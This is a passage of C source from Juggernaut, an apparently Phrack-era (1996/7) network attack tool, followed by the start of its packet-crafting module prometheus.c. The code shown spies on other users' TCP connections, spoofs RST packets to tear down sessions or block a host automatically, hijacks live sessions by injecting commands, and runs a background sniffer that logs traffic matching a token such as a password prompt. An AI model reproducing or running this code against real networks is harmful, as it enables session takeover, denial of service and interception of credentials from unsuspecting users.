| if(((int)msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg); |
| return; |
| #else |
| switch(ntohs(tcphp->dest)){ |
| case 21: |
| case 22: |
| case 23: |
| case 25: |
| case 80: |
| case 513: |
| case 6667: |
| if(((int)msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg); |
| return; |
| default: |
| return; |
| } |
| #endif |
| } |
|
|
|
|
| /* |
| * Spy on a connection. If the packet captured is from the target connection, |
| * call dumpp(). If fp is valid, prepend header/append footer. |
| */ |
|
|
| void cspy(target,fp) |
| struct connectionInfo *target; |
| FILE *fp; |
| { |
|
|
| char *hostLookup(unsigned long); |
| void dumpp(char *,int,FILE *); |
|
|
| extern int sigsentry; |
| int tlinksock=tap(DEVICE); /* Spying tap. XXX- Really dumb way to do this... */ |
| time_t tp; |
|
|
| ALIGNNETPOINTERS(); |
| |
| fprintf(stderr,"Spying on connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport)); |
| if(fp){ |
| fprintf(fp,"---------------------------------------------------------------------\n: Juggernaut connection spy log header\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport)); |
| time(&tp); |
| fprintf(fp,": Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp)); |
| } |
| /* NO alaram timeout here. SIGINT kills our spy session */ |
| while(sigsentry)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP)if(iphp->saddr==target->daddr&&tcphp->source==target->dport)dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),fp); |
| |
| if(fp){ |
| fprintf(fp,"\n---------------------------------------------------------------------\n: Juggernaut connection spy log trailer\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport) |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| ); |
| time(&tp); |
| fprintf(fp,": Log ended:\t\t%s---------------------------------------------------------------------\n",ctime(&tp)); |
| } |
| close(tlinksock); |
| } |
|
|
|
|
| /* |
| * Dumps the payload. Dump to file if we have a valid FP. |
| */ |
|
|
| void dumpp(payload,length,fp) |
| char *payload; |
| int length; |
| FILE *fp; |
| { |
| register int tickytacky=0; |
| |
| for(;tickytacky<length;tickytacky++){ |
| fprintf(stderr,"%c",payload[tickytacky]); |
| if(fp)fprintf(fp,"%c",payload[tickytacky]); |
| } |
| |
| } |
| |
|
|
| /* |
| * RST both ends of a connection. Listen for the client to send a packet so |
| * we know where the seq/ack #s are and then spoof 10 RSTs to the client which |
| * will then send a RST to the other end when it recieves the legitimate |
| * response packet. |
| */ |
|
|
| void crst(target) |
| struct connectionInfo *target; |
| { |
|
|
| void nettimeout(); |
| char *hostLookup(unsigned long); |
| unsigned short in_cksum(unsigned short *,int); |
|
|
| char *tempBuf=0; |
| extern int ripsock; |
| extern int netreadtimeout; |
|
|
| struct sockaddr_in sin; |
| |
| struct tpack{ /* Generic TCP packet w/o payload */ |
| struct iphdr ip; |
| struct tcphdr tcp; |
| }tpack; |
|
|
| struct psuedoHeader{ |
| unsigned long saddr; |
| unsigned long daddr; |
| unsigned char null; |
| unsigned char prot; |
| unsigned short tlen; |
| }*ppheader; |
| |
| static int moot=0; |
| int tlinksock=tap(DEVICE); |
|
|
| ALIGNNETPOINTERS(); |
|
|
| sin.sin_family=AF_INET; /* Preload these values. All we are really |
| waiting for are the seq/ack #s */ |
| sin.sin_port=target->dport; |
| sin.sin_addr.s_addr=target->saddr; |
|
|
| bzero(&tpack,sizeof(tpack)); /* Zero out these structures so I dunot |
| have to assign 0's to the unused |
| areas... */ |
| bzero(&ppheader,sizeof(ppheader)); |
|
|
| tpack.tcp.source=target->dport; /* 16-bit Source port number */ |
| tpack.tcp.dest=target->sport; /* 16-bit Destination port */ |
| tpack.tcp.doff=5; /* Data offset */ |
| tpack.tcp.ack=1; /* Acknowledgement field valid flag */ |
| tpack.tcp.rst=1; /* Reset flag */ |
| tpack.tcp.window=htons(242); /* 16-bit Window size */ |
|
|
| tpack.ip.version=4; /* 4-bit Version */ |
| tpack.ip.ihl=5; /* 4-bit Header Length */ |
| tpack.ip.tot_len=htons(IPHDR+TCPHDR); /* 16-bit Total length */ |
| tpack.ip.ttl=64; /* 8-bit Time To Live */ |
| tpack.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */ |
|
|
| tpack.ip.saddr=target->daddr; /* 32-bit Source Address */ |
| tpack.ip.daddr=target->saddr; /* 32-bit Destination Address */ |
|
|
| tempBuf=(char *)malloc(PHDR+TCPHDR); /* Checksum stuff */ |
| ppheader=(struct psuedoHeader *)tempBuf; |
| |
| ppheader->saddr=tpack.ip.saddr; |
| ppheader->daddr=tpack.ip.daddr; |
| ppheader->prot=IPPROTO_TCP; |
| ppheader->null=0; |
| ppheader->tlen=htons(TCPHDR); |
| |
| fprintf(stderr,"Reseting connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport)); |
| |
| if(setjmp(env)){ /* Timeout */ |
| if(verbosity)fprintf(stderr,"Quiet connection, not reset. [soft error, returning]\n"); |
| return; |
| } |
| signal(SIGALRM,nettimeout); |
| alarm(netreadtimeout); /* Wait 10 seconds for reply */ |
|
|
| while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->saddr&&tcphp->source==target->sport){ |
|
|
| for(;moot<RSTS;moot++){ /* Send RSTs, incrementing |
| seqs and acks as we go */ |
| tpack.tcp.seq=tcphp->ack_seq+(htonl(moot)); |
| tpack.tcp.ack_seq=tcphp->seq+(htonl(moot)); |
|
|
| bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR); |
| tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR); |
|
|
| sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin)); |
| } |
| alarm(0); |
|
|
| /*free(tempBuf); XXX */ |
| fprintf(stderr,"Connection torn down.\n"); |
| close(tlinksock); |
| break; |
| } |
| } |
|
|
|
|
| /* |
| * Sets up automated connection reseting. A source and possibly a |
| * destination host are targeted for reseting. This function will kill any |
| * connection attempts from the source (and possibly to a destination). |
| */ |
|
|
| void acrst(source,target) |
| unsigned long source, target; |
| { |
|
|
| char *hostLookup(unsigned long); |
| unsigned short in_cksum(unsigned short *,int); |
| void spasm(); /* Handles the user defined signal */ |
|
|
| struct tpack{ |
| struct iphdr ip; |
| struct tcphdr tcp; |
| }tpack; |
|
|
| struct psuedoHeader{ |
| unsigned long saddr; |
| unsigned long daddr; |
| unsigned char null; |
| unsigned char prot; |
| unsigned short tlen; |
| }*ppheader; |
| |
| struct sockaddr_in sin; |
| |
| int moot=0; |
| extern int ripsock; |
| extern int acrstpid; |
| char *tempBuf=0; |
| int tlinksock=tap(DEVICE); |
|
|
| switch((acrstpid=fork())){ /* Drop a child to backround, return the |
| parent to continue */ |
| case 0: /* Set the priority up a few notchs.. |
| I get better results */ |
| if(setpriority(PRIO_PROCESS,0,-20)){ |
| if(verbosity)perror("acrst module (setpriority)"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
| signal(SIGUSR1,spasm); /* Keep track of the child and register |
| it with the cleanup signal handler */ |
| signal(SIGINT,SIG_IGN); |
| signal(SIGQUIT,SIG_IGN); |
| break; |
| default: |
| return; |
| case -1: |
| if(verbosity)perror("acrst module Internal forking error [fatal]"); |
| exit(1); |
| } |
|
|
| ALIGNNETPOINTERS(); |
| /* Preload these values. */ |
| sin.sin_family=AF_INET; |
| |
| bzero(&tpack,sizeof(tpack)); |
| bzero(&ppheader,sizeof(ppheader)); |
| |
| tpack.tcp.doff=5; |
| tpack.tcp.ack=1; |
| tpack.tcp.rst=1; |
| tpack.tcp.window=htons(242); |
|
|
| tpack.ip.version=4; |
| tpack.ip.ihl=5; |
| tpack.ip.tot_len=htons(IPHDR+TCPHDR); |
| tpack.ip.ttl=64; |
| tpack.ip.protocol=IPPROTO_TCP; |
|
|
| tempBuf=(char *)malloc(PHDR+TCPHDR); |
| ppheader=(struct psuedoHeader *)tempBuf; |
|
|
| ppheader->null=0; |
| ppheader->prot=IPPROTO_TCP; |
| ppheader->tlen=htons(TCPHDR); |
| |
| while(1){ |
| if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&tcphp->syn&&iphp->saddr==source){ |
| if(target)if(iphp->daddr!=target)continue; |
|
|
| sin.sin_port=tcphp->dest; |
| sin.sin_addr.s_addr=iphp->saddr; |
| |
| tpack.tcp.source=tcphp->dest; |
| tpack.tcp.dest=tcphp->source; |
|
|
| for(moot=1;moot<RSTS+1;moot++){ /* Send RSTs, incrementing |
| acks as we go */ |
|
|
| tpack.tcp.ack_seq=tcphp->seq+(htonl(moot)); |
|
|
| tpack.tcp.check=0; |
| tpack.ip.saddr=iphp->daddr; |
| tpack.ip.daddr=iphp->saddr; |
| tpack.ip.check=0; |
| |
| ppheader->saddr=tpack.ip.saddr; |
| ppheader->daddr=tpack.ip.daddr; |
|
|
| bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR); |
| tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR); |
|
|
| sendto(ripsock,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin)); |
| fprintf(stderr,"%c-%c*",0x08,0x08); |
| } |
| } |
| } |
| } |
|
|
| /* |
| * Simplex-hijack. Really just inserts a command into the TCP stream. This |
| * will totally desynch the connection however and cause two things to happen: |
| * 1) an ACK storm of epic proportions (maybe not, see accompanying paper) and |
| * 2) the target user will have her connection destroyed. To alleviate the |
| * first problem, we simply reset the connection shortly after we hijack it. |
| * The second problem is a burden with this kind of hijacking. |
| */ |
|
|
| void csimplexhijack(target,commandbuf) |
| struct connectionInfo *target; |
| char *commandbuf; |
| { |
|
|
| void nettimeout(); |
| char *hostLookup(unsigned long); |
| unsigned short in_cksum(unsigned short *,int); |
|
|
| struct tpack{ /* Generic TCP packet */ |
| struct iphdr ip; |
| struct tcphdr tcp; |
| char payload[BUFSIZE]; |
| }tpack; |
| |
| struct psuedoHeader{ |
| unsigned long saddr; |
| unsigned long daddr; |
| unsigned char null; |
| unsigned char prot; |
| unsigned short tlen; |
| }*ppheader; |
| |
| struct sockaddr_in sin; |
|
|
| extern int ripsock; |
| extern int netreadtimeout; |
| static int len; |
| char *tempBuf; |
| int tlinksock=tap(DEVICE); |
|
|
| ALIGNNETPOINTERS(); |
|
|
| bzero(&tpack,sizeof(tpack)); |
|
|
| len=strlen(commandbuf)+1; |
| bcopy(commandbuf,tpack.payload,len--); |
| sin.sin_family=AF_INET; |
| sin.sin_port=target->sport; |
| sin.sin_addr.s_addr=target->daddr; |
|
|
| tpack.tcp.source=target->sport; |
| tpack.tcp.dest=target->dport; |
| tpack.tcp.doff=5; |
| tpack.tcp.ack=1; |
| tpack.tcp.psh=1; |
| tpack.tcp.window=htons(242); |
|
|
| tpack.ip.version=4; |
| tpack.ip.ihl=5; |
| tpack.ip.tot_len=htons(IPHDR+TCPHDR+len); |
| tpack.ip.ttl=64; |
| tpack.ip.protocol=IPPROTO_TCP; |
|
|
| tpack.ip.saddr=target->saddr; |
| tpack.ip.daddr=target->daddr; |
|
|
| tempBuf=(char *)malloc(PHDR+TCPHDR+len); /* Check me out y0 */ |
| ppheader=(struct psuedoHeader *)tempBuf; |
|
|
|
|
| ppheader->saddr=tpack.ip.saddr; |
| ppheader->daddr=tpack.ip.daddr; |
| ppheader->null=0; |
| ppheader->prot=IPPROTO_TCP; |
| ppheader->tlen=htons(TCPHDR+len); |
| |
| fprintf(stderr,"(simplex) Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport)); |
| |
| if(setjmp(env)){ /* Timeout */ |
| if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n"); |
| return; |
| } |
| signal(SIGALRM,nettimeout); |
| alarm(0); |
| alarm(netreadtimeout); /* Wait 10 seconds for reply */ |
| |
| while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){ |
| tpack.tcp.seq=tcphp->ack_seq; |
| tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1); |
|
|
| bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len); |
| tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len); |
|
|
| sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin)); |
|
|
| fprintf(stderr,"Command inserted, connection desynched.\n"); |
| sleep(JCKRST); /* Don't reset the connection too quickly, or |
| our command may not complete */ |
| crst(target); |
| close(tlinksock); |
| /* free(tempBuf); XXX */ |
| break; |
| } |
| } |
|
|
| /* |
| * Hijack. Desynchs the server from the client. The resulting ACK storm |
| * makes things very difficult. |
| */ |
|
|
| void chijack(target) |
| struct connectionInfo *target; |
| { |
|
|
| void nettimeout(); |
| void seizure(); |
| char *hostLookup(unsigned long); |
| unsigned short in_cksum(unsigned short *,int); |
| |
|
|
| struct tpack{ |
| struct iphdr ip; |
| struct tcphdr tcp; |
| char payload[2*BUFSIZE]; |
| }tpack; |
|
|
| struct psuedoHeader{ |
| unsigned long saddr; |
| unsigned long daddr; |
| unsigned char null; |
| unsigned char prot; |
| unsigned short tlen; |
| }*ppheader; |
|
|
| struct sockaddr_in sin; |
|
|
| char buf[10*MINIBUF]; |
| char *tempBuf=0; |
|
|
| extern int ripsock; |
| extern int netreadtimeout; |
| extern int sigsentry; |
| static int len; |
| int tlinksock=tap(DEVICE); |
| |
| ALIGNNETPOINTERS(); |
|
|
| bzero(&tpack,sizeof(tpack)); |
|
|
| sin.sin_family=AF_INET; |
| sin.sin_port=target->sport; |
| sin.sin_addr.s_addr=target->daddr; |
|
|
| tpack.tcp.source=target->sport; |
| tpack.tcp.dest=target->dport; |
| tpack.tcp.doff=5; |
| tpack.tcp.ack=1; |
| tpack.tcp.psh=1; |
| tpack.tcp.window=htons(1024); |
|
|
| tpack.ip.version=4; |
| tpack.ip.ihl=5; |
| tpack.ip.ttl=64; |
| tpack.ip.protocol=IPPROTO_TCP; |
|
|
| tpack.ip.saddr=target->saddr; |
| tpack.ip.daddr=target->daddr; |
|
|
| tempBuf=(char *)malloc(PHDR+TCPHDR+len); |
| ppheader=(struct psuedoHeader *)tempBuf; |
|
|
| ppheader->saddr=tpack.ip.saddr; |
| ppheader->daddr=tpack.ip.daddr; |
| ppheader->null=0; |
| ppheader->prot=IPPROTO_TCP; |
|
|
| signal(SIGINT,seizure); |
|
|
| fprintf(stderr,"Hijacking connection:\t %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup (target->daddr),ntohs(target->dport)); |
| fprintf(stderr,"'ctrl-c' when you are finished (this will RST the connection).\n"); |
| fprintf(stderr,"juggernaut>"); |
|
|
| fgets(buf,sizeof(buf),stdin); |
|
|
| len=strlen(buf)+1; |
| bcopy(buf,tpack.payload,len--); |
|
|
| tpack.ip.tot_len=htons(IPHDR+TCPHDR+len); |
| ppheader->tlen=htons(TCPHDR+len); |
|
|
| if(setjmp(env)){ |
| if(verbosity)fprintf(stderr,"Quiet connection, try again later. [soft error, returning]\n"); |
| return; |
| } |
| signal(SIGALRM,nettimeout); |
| alarm(0); |
| alarm(netreadtimeout); |
| /* Here we setup the initial hijack state. We |
| need to desynch the connection, and the next |
| packet that comes by will be the catalyst. */ |
| while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){ |
| tpack.tcp.seq=tcphp->ack_seq; |
| tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1); |
|
|
| bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len); |
| tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len); |
| |
| sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin)); |
| break; |
| } |
| |
| alarm(0); |
| while(sigsentry){ /* Main hijack loop */ |
| if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP&&iphp->saddr==target->daddr&&tcphp->source==target->dport){ |
| if(!tcphp->psh)continue; /* If this is not data, ignore it */ |
| dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),0); |
|
|
| bzero(&buf,sizeof(buf)); |
| fgets(buf,sizeof(buf),stdin); |
| |
| if(!buf[1])continue; /* No input data (CR) */ |
|
|
| len=strlen(buf)+1; |
| bcopy(buf,tpack.payload,len--); |
| tpack.tcp.psh=1; |
| tpack.tcp.check=0; |
| tpack.ip.check=0; |
|
|
| tpack.ip.tot_len=htons(IPHDR+TCPHDR+len); |
|
|
| tpack.tcp.seq=tcphp->ack_seq; |
| tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1); |
|
|
| ppheader->tlen=htons(TCPHDR+len); |
| bcopy(&tpack.tcp,tempBuf+PHDR,PHDR+TCPHDR+len); |
| tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+len); |
|
|
| sendto(ripsock,&tpack,IPHDR+TCPHDR+len,0,(struct sockaddr *)&sin,sizeof(sin)); |
| } |
| } |
| crst(target); |
| /*free(tempBuf); XXX */ |
| close(tlinksock); |
| } |
|
|
|
|
| /* |
| * Packet sniffer parses TCP packets for token. Logs that packet, along with |
| * the next 'enticement` number of packets. Not really all that robust. |
| */ |
|
|
| void bloodhound(token,enticementfactor) |
| char *token; |
| int enticementfactor; |
| { |
|
|
| void parsep(char *,int,FILE *); |
| void shadow(); |
| char *hostLookup(unsigned long); |
|
|
| FILE *fp=0; |
| time_t tp=0; |
|
|
| int length=0; |
| int grabflag=0; /* Time to grab some packets */ |
| unsigned long targetsourceip=0; |
| unsigned short targetsourceport=0; |
| int tlinksock=tap(DEVICE); |
|
|
| if(!(fp=fopen(SNIFLOG,"a+"))){ /* Log to file */ |
| if(verbosity){ |
| fprintf(stderr,"Cannot open file for logging. [fatal]\n"); |
| fprintf(stderr,"[cr]"); |
| } |
| exit(0); |
| } |
|
|
| ALIGNNETPOINTERS(); |
|
|
| fprintf(stderr,"\nDropping to background, sniffing for smarmy tidbits...\n"); |
|
|
| shadow(); /* Dropped to the background */ |
| fprintf(stderr,"\nSend a SIGKILL to %d when you are thorugh.\n",getpid()); |
| |
| fprintf(fp,"\n---------------------------------------------------------------------\n[ Juggernaut bloodhound module log: token == '%s' ]\n",token); |
| time(&tp); |
| fprintf(fp,"[ Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp)); |
| fflush(fp); |
| |
| while(1)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP){ |
| length=htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp); |
|
|
| if((!grabflag)&&(strstr((epack.payload-2),token))){ |
| grabflag=enticementfactor; |
| targetsourceip=iphp->saddr; |
| targetsourceport=tcphp->source; |
| fprintf(fp,"\n\t %s [%d]\t<-->\t %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest)); |
| parsep(epack.payload-2,length,fp); |
| } |
| if(grabflag){ /* We have a session marked and are |
| logging it */ |
| if(iphp->daddr==targetsourceip&&tcphp->dest==targetsourceport){ |
| parsep(epack.payload-2,length,fp); |
| grabflag--; |
| } |
| } |
| } |
| /* NOTREACHED */ |
| } |
|
|
|
|
| /* |
| * Packet parser. Print the packet out... |
| */ |
|
|
| void parsep(payload,length,fp) |
| char *payload; |
| int length; |
| FILE *fp; |
| { |
| register int tickytacky=0; |
|
|
| for(tickytacky=0;tickytacky<length;tickytacky++){ |
| if(payload[tickytacky]==0xd){ /* newline characater */ |
| fprintf(fp,"\n"); |
| continue; |
| } |
| if(isprint(payload[tickytacky]))fprintf(fp,"%c",payload[tickytacky]); |
| } |
| fflush(fp); |
| } |
|
|
|
|
| /* |
| * Handles network timeouts. |
| */ |
|
|
| void nettimeout(){ |
|
|
| alarm(0); |
| longjmp(env,1); |
| } |
| <--> |
| <++> Juggernaut/NumberOneCrush/prometheus.c |
| /* |
| * |
| * Juggernaut |
| * Version b2 |
| * |
| * 1996/7 Guild productions |
| * daemon9[guild|phrack|r00t] |
| * |
| * comments to route@infonexus.com |
| * |
| * This coding project made possible by a grant from the Guild corporation |
| * |
| * prometheus.c - the packet assemby workshop module. Each of the main |
| * packet assembly subfunctions will end up calling the ip assembler to build |
| * the IP portion and send it (them) out. |
| * |
| * Too many dependencies in menu.c |
| * |
| * Shout out to Nirva for some suggestions/help. Nirva rules, BTW. I love |
| * Nirva. You should too. |
| * |
| */ |
|
|
|
|
| #include <stdio.h> |
| #include <string.h> |
| #include <stdlib.h> |
| #include <time.h> |
| #include <netinet/in.h> |
| #include <unistd.h> |
| #include <arpa/inet.h> |
| #include <netdb.h> |
| #include <arpa/inet.h> |
| #include <sys/types.h> |
| #include <sys/stat.h> |
| #include <fcntl.h> |
| #include <linux/socket.h> |
| #include <linux/ip.h> |
| #include <linux/tcp.h> |
| #include <linux/udp.h> |
| #include <linux/icmp.h> |
| #include <linux/if_ether.h> |
| #include <linux/if.h> |
| |
| #define MINIBUF 10 |
| #define BUFSIZE 512 |
| #define ETHHDR 14 |
| #define PHDR 12 |
| #define TCPHDR 20 |
| #define UDPHDR 8 |
| #define IPHDR 20 |
|
|
| #define NOTRANSPORT 0x00 |
| #define TCPTRANSPORT 0x01 |
| #define UDPTRANSPORT 0x02 |
| #define ICMPTRANSPORT 0x04 |
|
|
| struct tpak{ /* TCP packet */ |
| struct tcphdr tcp; |
| char payload[BUFSIZE]; |
| }tpack; |
|
|
| struct upak{ /* UDP packet */ |
| struct udphdr udp; |
| char payload[BUFSIZE]; |
| }upack; |
|
|
| struct ipak{ /* ICMP packet */ |
| struct icmphdr icmp; |
| char payload[BUFSIZE]; |
| }ipack; |
|
|
| struct rippak{ /* IP packet */ |
| struct iphdr ip; |
| char payload[BUFSIZE+20]; /* Payload + transport header */ |
| }rippack; |
|
|
| int woe; /* Global var to let us know where to return |
| to... */ |
| extern int verbosity; |
|
|
| /* This will change when IP/TCP options are |
| implemented... */ |
| #define RIPPACKETSIZE 552 /* IP header + transport header of up to 20 |
| bytes + 512 byte payload */ |
|
|
| int prometheus(type) |
| int type; |
| { |
| void tcpa(); |
| void udpa(); |
| void icmpa(); |
| void igmpa(); |
| void ripa(int); |
|
|
| bzero(&rippack,sizeof(rippack)); |
| woe=0; |
|
|
| switch(type){ |
| case 1: |
| tcpa(); /* TCP */ |
| break; |
| case 2: |
| udpa(); /* UDP */ |
| break; |
| case 3: |
| icmpa(); /* ICMP */ |
| break; |
| case 4: |
| ripa(NOTRANSPORT); /* RAW IP with no transport and no payload */ |
| break; |
| case 5: |
| return(woe=1); /* Done assembling packets */ |
| default: |
| break; /* bad input -- not done */ |
| } |
| return(woe); |
| } |
|
|
|
|
| /* |
| * TCP assembler |
| */ |
|
|
| void tcpa(){ |
|
|
| void ripa(int); |
| void mwipe(); |
| void mpktatcp(int,unsigned short,unsigned short,unsigned long,unsigned long,char *,unsigned short,char *); |
|
|
| char buf[2*MINIBUF]; |
| unsigned long val; |
| int packetready=0; /* flag bits */ |
| char data[4*MINIBUF]={0},flags[MINIBUF]={0},filename[4*MINIBUF]={0}; |
| int i,j,fd,loopsentry=1; |
|
|
| bzero(&tpack,sizeof(tpack)); |
|
|
| srandom((unsigned)time(0)); /* seed psuedo random number generator */ |
|
|
| while(loopsentry){ |
| mwipe(); |
| mpktatcp(packetready,ntohs(tpack.tcp.source),ntohs(tpack.tcp.dest),ntohl(tpack.tcp.seq),ntohl(tpack.tcp.ack_seq),flags,ntohs(tpack.tcp.window),data); |
| |
| fgets(buf,sizeof(buf),stdin); |
| if(!(val=atoi(buf)))continue; |
| switch(val){ |
| case 1: /* Source Port */ |
| fprintf(stderr,"\nSource Port (0 - 65535) [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='r'){ |
| tpack.tcp.source=htons(random()&0xffff); |
| packetready|=0x01; |
| break; |
| } |
| if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){ |
| if(packetready&0x01)packetready^=0x01; /* Clear flag |
| if set */ |
| tpack.tcp.source=0; |
| break; |
| } |
| tpack.tcp.source=htons(val); |
| packetready|=0x01; |
| break; |
| case 2: /* Destination Port */ |
| fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='r'){ |
| tpack.tcp.dest=htons(random()&0xffff); |
| packetready|=0x02; |
| break; |
| } |
| if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){ |
| if(packetready&0x02)packetready^=0x02; |
| tpack.tcp.dest=0; |
| break; |
| } |
| tpack.tcp.dest=htons(val); |
| packetready|=0x02; |
| break; |
| case 3: /* Sequence Number */ |
| fprintf(stderr,"\nSequence Number (0 - 4294967295) [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='r'){ |
| tpack.tcp.seq=htonl(random()); |
| packetready|=0x04; |
| break; |
| } |
| if(buf[0]=='q'||buf[0]=='-'){ |
| if(packetready&0x04)packetready^=0x04; |
| tpack.tcp.seq=0; |
| break; |
| } |
| tpack.tcp.seq=htonl(strtoul(buf,0,10)); |
| packetready|=0x04; |
| break; |
| case 4: /* Acknowledgement Number */ |
| fprintf(stderr,"\nAcknowledgement Number (0 - 4294967295) [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='r'){ |
| tpack.tcp.ack_seq=htonl(random()); |
| packetready|=0x08; |
| break; |
| } |
| if(buf[0]=='q'||buf[0]=='-'){ |
| if(packetready&0x08)packetready^=0x08; |
| tpack.tcp.ack_seq=0; |
| break; |
| } |
| tpack.tcp.ack_seq=htonl(strtoul(buf,0,10)); |
| packetready|=0x08; |
| break; |
| case 5: /* Control Flags */ |
| i=0; |
| bzero(flags,sizeof(flags)); |
| fprintf(stderr,"\nURG? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x10)packetready^=0x10; |
| tpack.tcp.urg=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| tpack.tcp.urg=1; |
| flags[i++]='U'; |
| } |
| fprintf(stderr,"\nACK? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x10)packetready^=0x10; |
| tpack.tcp.ack=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| tpack.tcp.ack=1; |
| flags[i++]='A'; |
| } |
| fprintf(stderr,"\nPSH? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x10)packetready^=0x10; |
| tpack.tcp.psh=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| tpack.tcp.psh=1; |
| flags[i++]='P'; |
| } |
| fprintf(stderr,"\nRST? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x10)packetready^=0x10; |
| tpack.tcp.rst=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| tpack.tcp.rst=1; |
| flags[i++]='R'; |
| } |
| fprintf(stderr,"\nSYN? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x10)packetready^=0x10; |
| tpack.tcp.syn=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| tpack.tcp.syn=1; |
| flags[i++]='S'; |
| } |
| fprintf(stderr,"\nFIN? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x10)packetready^=0x10; |
| tpack.tcp.fin=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| tpack.tcp.fin=1; |
| flags[i++]='F'; |
| } |
| if(!flags[0])strcpy(flags,"none set"); |
| packetready|=0x10; |
| break; |
| case 6: /* Window Size */ |
| fprintf(stderr,"\nWindow Size (0 - 65535) [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='r'){ |
| tpack.tcp.window=htons(random()&0xffff); |
| packetready|=0x20; |
| break; |
| } |
| if(buf[0]=='q'||(val=atoi(buf))<0||val>65535){ |
| if(packetready&0x20)packetready^=0x20; |
| tpack.tcp.window=0; |
| break; |
| } |
| tpack.tcp.window=htons(val); |
| packetready|=0x20; |
| break; |
| case 7: /* Data payload */ |
| bzero(data,sizeof(data)); |
| bzero(tpack.payload,sizeof(tpack.payload)); |
| bzero(filename,sizeof(filename)); |
| fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='c'){ /* Input from command line */ |
| fprintf(stderr,"\nEnter Payload [q] >"); |
| fgets(tpack.payload,sizeof(tpack.payload),stdin); |
| strncpy(data,tpack.payload,sizeof(data)); |
| packetready|=0x40; |
| break; |
| } |
| if(buf[0]=='f'){ /* Input from file */ |
